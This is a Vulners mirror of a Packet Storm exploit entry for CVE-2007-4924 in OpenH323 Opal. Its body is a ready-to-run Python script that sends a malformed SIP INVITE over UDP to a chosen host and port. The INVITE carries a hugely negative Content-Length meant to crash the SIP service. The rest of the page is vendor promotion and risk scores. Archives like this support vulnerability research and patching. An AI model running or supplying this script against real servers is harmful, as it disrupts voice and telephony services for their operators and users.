Lucene search
K

OpenH323 Opal SIP Denial Of Service

🗓️ 24 Jul 2009 00:00:00Reported by Jose Miguel EsparzaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924) exploi

Related
Code
`#!/usr/bin/env python  
#  
# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)  
#  
# opal228_dos.py by Jose Miguel Esparza  
# 2007-10-08 S21sec labs  
  
import sys,socket  
  
if len(sys.argv) != 3:  
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")  
target = sys.argv[1]  
targetPort = int(sys.argv[2])  
malformedRequest = "INVITE sip:[email protected] SIP/2.0\r\n"+\  
"Call-ID:[email protected]\r\n"+\  
"Contact:sip:[email protected]:5060\r\n"+\  
"Content-Length:-40999990\r\n"+\  
"Content-Type:application/sdp\r\n"+\  
"CSeq:4321 INVITE\r\n"+\  
"From:sip:[email protected]:5060;tag=a48s\r\n"+\  
"Max-Forwards:70\r\n"+\  
"To:sip:[email protected]\r\n"+\  
"Via:SIP/2.0/UDP 192.168.1.133:5060;branch=z9hG4bK74b76\r\n\r\n"   
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
s.connect((target,targetPort))  
s.sendall(malformedRequest)  
s.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2009 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.23131
29